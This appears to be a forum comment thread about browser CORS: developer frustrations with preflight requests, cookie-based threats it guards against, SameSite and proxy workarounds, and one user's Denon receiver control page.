What drives me nuts with CORS is there's no (easy) way to disable it in the browser for development purpose, e.g. when I want to run some scripts in a local HTML file to do some basic web scrapping.
I was interested to learn about 'no-cors' where you get a sparse response. Was hoping to use it to find out if a web page was being accessed from a client's internal network or not (by trying to get a page that only existed there and inspecting the response)
In the end I didn't get to find out if it worked or not due to boring reasons.
At least Chrome and Firefox don't block it. I've recently used something similar as an add-on until I did exactly what he said: manually setting a cors * header for that internal development server
Do you know what's preventing it from working in Firefox Focus/Klar? "Get Started" button does nothing unless tracker blocking (4 detected) is turned off. All tracker blocking options plus web fonts blocking are on, JavaScript is allowed and Cookies are allowed excpet 3rd party.
I hope, some day to actually understand CORS. What it does. Why it exists. What good does it do. It seems extremely weird to me that my web page cannot get a simple json file from my GCP VM which is just serving that file and nothing else.
The problem with cross-origin requests as I understand it essentially boils down to cookies. If cross-origin requests weren't blocked by default, any site you visit could send requests to your bank, for example. Since those requests would send auth cookies, they could potentially make changes to your bank account. So these requests are disabled by browsers unless the bank explicitly tells them (via CORS headers) that it's ok.
IMO the better way to handle it is by allowing cross-origin requests, but locking down cookies so they aren't sent cross-domain by default (ie by setting SameSite on cookies). For my services I generally open CORS up, but only implement authenticated requests with API tokens. The main problem is if you set a custom header (such as Authorization: Bearer) it triggers a preflight request. The only reasonable way I know around this is sending the token in the query parameters, but that also introduces some security issues.
Let's say you're logged in to facebook. Without CORS any site you visit in your browser could send a javascript request to facebook.com/postmessage, posting messages as yourself without your knowledge or consent ;)
That's a problem, so browser block cross site requests (CORS) by default.
Beautiful, definitely one of the clearest walkthroughs I've seen on CORS, with enough detail to understand what's going on with all those magic headers.
I've tried to deal with CORS, but I find it very confusing which different setting covers which scenario and which side needs to send what.
Maybe I'm missing something obvious, but I was trying to get a pdf file embedded in an iframe, where the pdf and the web page are on the same server.
So what needs to be sent with the webpage that has the iframe tag's response? What needs to be sent with the pdf file's response?
Also, I have some links that pull in styles from an external CDN (probably something I need to eliminate at some point, but these styles pull in font resources using relative urls and I need to untangle all of that to set it up locally, and it's probably not worth it at the development stage). These broke while I was experimenting with CORS.
I also have images and scripts and styles that are local.
Browser-variations on the CORS headers and conflicts between different headers was something else I found confusing.
I just ended up disabling CORS, probably will look into it again when I'm preparing to move into production, but it really struck me as a frustrating time sink.
My main issue with CORS is the latency doubling introduced by preflight requests. I wish there was a more secure escape hatch for that than including things like access tokens in the query parameters[0].
That helps, but not for the first request at each endpoint, and for my use case I have many different endpoints. I wish there was an option to cache CORS for subpaths, kind of like how you can make a cookie valid for any subpaths under a specific path.
I think the usual approach is to proxy the other domain (or subdomain) to a path on your user-facing domain. E.g. if mysite.com is making requests to api.mysite.com, you would proxy api.mysite.com to mysite.com/api.
I'm building a pure backend service that I want app developers to be able to consume. If they have a static app, they shouldn't be required to run their own backend just to get around CORS. At the very least you're adding an extra hop, which is going to increase latency.
That said, it would be cool if static hosting services like S3 offered CORS proxies for uses like this. I wonder if that's a thing.
I just which chrome would finally implement CORS correctly.
The main compatibility problem between FF and chrome I run into is that chrome doesn't completely enforces CORS allowing some requests it should not if it would be standard conform and sites only testing it on chrome.
One thing that confuses me about CORS is who it is trying to protect. I'd never really looked into it recently, as I'd never done anything that needed a cross origin request.
But recently I wanted to make a little web page that could control my Denon A/V receiver. The receiver has two or three different network APIs. There's one that uses telnet, and a couple of different HTTP ones.
You can point a browser at the receiver, and it gives you a page for controlling the receiver using one of the HTTP APIs. The API is reasonably fast, but the control page itself is glacial. A bit of poking around in the browser looking at requests and responses in the network monitor in the developer tools told me how to use that API.
The other HTTP API is used by the Denon mobile app. A bit of packet sniffing while using the mobile app told me how to use that API. Like the other HTTP API, that one is fast. The mobile app is also responsive, once it launches, but sometimes it takes a fair bit of time to find the receiver.
What I wanted was a simple web page, that I could stick on my website on Amazon Lightsail, which would just tell me the current source and volume, have buttons to switch between sources, and buttons for setting the volume. The page would use JavaScript to talk to the Denon.
Well, this was fine for changing inputs and volume, because those were simple GET requests. The Denon's web server doesn't implement CORS at all, so the responses lack any CORS headers, and the browser rejects them...but by that time the actual desired action has taken place on the server so I can just ignore the error.
For source and volume, that doesn't work because I need to get the returned data.
I flailed around for a while trying to find a way around this. Finally I ended up giving up on the original place of having my page on my outside website. Instead I stuck it on an RPi that is in my living room controlling a space heater and doing temperature monitoring, and put some server side code on the RPi to control the Denon. The page then invokes that code on the RPi to do the actual commands to the Denon. The web page is only interacting with the RPi, so no CORS worries.
I probably got a bad impression of CORS from all this, but I can't figure out what it actually helps. Lets say we have a site that came from site S, running on the browser of user U, and from there is trying to do a cross-origin request to site C.
It's not protecting C from anything I can see, because any restrictions C specifies in the CORS response headers depend on U honoring them to do anything. Someone trying to do something malicious with C could just ignore them.
It's not protecting U from scripts sending out personal information to C, because CORS doesn't block sending information if you do your sending in a way to not trigger the preflight check, which is easy to do. It just blocks your browser from doing anything with the response.
If a bad guy is able to get scripts to run U's browser for a site from S, it does block those scripts from getting data from C (unless C says it is OK). But if the bad guy really needs their script to get data from C, they could just go through an intermediate server they control that relays data from C. They control the CORS headers on their server, and can strip the CORS headers that come from C.
What am I missing?
PS: the Denon control page came out nice, I think [1] (well, except the centering of the "Recheck status" button looks off a bit...never noticed that before). It's all flexbox layout that resizes reasonable, so it is quite usable on my iPhone, iPad, Surface Pro 4, and iMac.
> But if the bad guy really needs their script to get data from C, they could just go through an intermediate server they control that relays data from C.
Your browser has access to 2 things that the malicious actor's server doesn't:
1. your cookies (which it will normally send with any HTTP requests it makes)
2. your network position (for example if you're on a private corporate network and have access to some internal corporate servers)
FWIW, #1 is both easily fixed and AFAIK mostly already fixed (making cookies additionally scoped by origin of the requesting page, preventing "third-party cookies"). To the extent to which it isn't fixed, it should be fixed at that level.
> It's not protecting C from anything I can see, because any restrictions C specifies in the CORS response headers depend on U honoring them to do anything. Someone trying to do something malicious with C could just ignore them
U will honor the CORS headers, unless they disable Web security in their browser. If U visits a Website with some malicious JS that tries to access C, that request will be blocked. One doesn't simply pass CORS on the client side,the relevant headers are forbidden and can't be rewritten or worked around unless you use some Proxy Server.
You can still host your frontend wherever you want. The simplest solution would probably be to set up your RPi with just an nginx server that proxies requests to your devices and injects the CORS headers. But you already have it working so most likely not worth the effort to change it.